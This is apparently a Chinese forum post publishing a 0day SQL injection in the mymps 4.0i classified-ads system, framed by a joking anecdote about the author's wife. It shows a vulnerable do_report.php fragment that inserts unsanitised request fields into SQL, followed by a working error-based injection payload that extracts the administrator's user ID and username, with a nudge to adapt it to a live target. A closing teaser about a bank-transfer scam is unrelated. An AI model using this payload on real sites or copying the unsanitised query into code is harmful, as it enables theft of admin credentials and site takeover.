Team ：CodePlay

原因：

老婆说自己月经怎么还不来呢，急死了。。。突然老婆月经来了。囧，这是事实。。。

老婆说：“你个屌丝，懂什么是月经么。”

作者说：“不懂！”。

老婆说“那你去做你屌丝应该做的事情吧，必须先把我送回去，不然你让我自己走，我会晕倒的！”。我流泪了。

谢谢老婆,你原谅我是一位屌丝。

文件do_report.php

 '".mktime(0,0,0)."'") > 0){
        echo "操作失败，该信息您已经举报过了！";
        exit;
}
$db->query("INSERT INTO `{$db_mymps}info_report` (report_type,content,infoid,infotitle,ip,pubtime)VALUES('$report_type','$content','$infoid','$infotitle','$ip','".$timestamp."')");
echo "
感谢您的举报 :)
● 在".$mymps_global[SiteName]."，每天有数千条违规信息通过用户举报被删除。● 如果你是不小心点错了举报按钮，别担心。只有当一个信息收到一定数量的举报时才会被删除。
";
?>

一看都是注入 //

然后看看是哪个文件

上图就是问题所在

利用代码如下:

代码如下

part=do_report&infoid=87382231&infotitle=123','ip1',(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,userid,0x2D,uname,0x7E31)%20FROM%20my_admin%20where id=1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))#&report_type=2&content=asasas

infoid需要修改下，不然，你懂的。哈哈。

原帖大亮吐槽：

擦，屌丝哪能有老婆啊？你这个披着包皮的高富帅

文章来源于lcx.cc:蚂蚁php分类信息系统 mymps 4.0i utf版0Day

相关推荐: 【防骗】又见网银诈骗，骗子冒充朋友，借口卡丢了先借你卡转账用用，揭秘！

又见网银诈骗... rabbitsafe | 2013-11-25 23:27 今天有个QQ突然加我,看了下第一反应不是社工就是骗子,给大家看下聊天记录. 之后骗子就没回消息了 骗子并不高明,但如果碰到有心的骗子.....(要获取卡号姓名身份证电话太容易了..…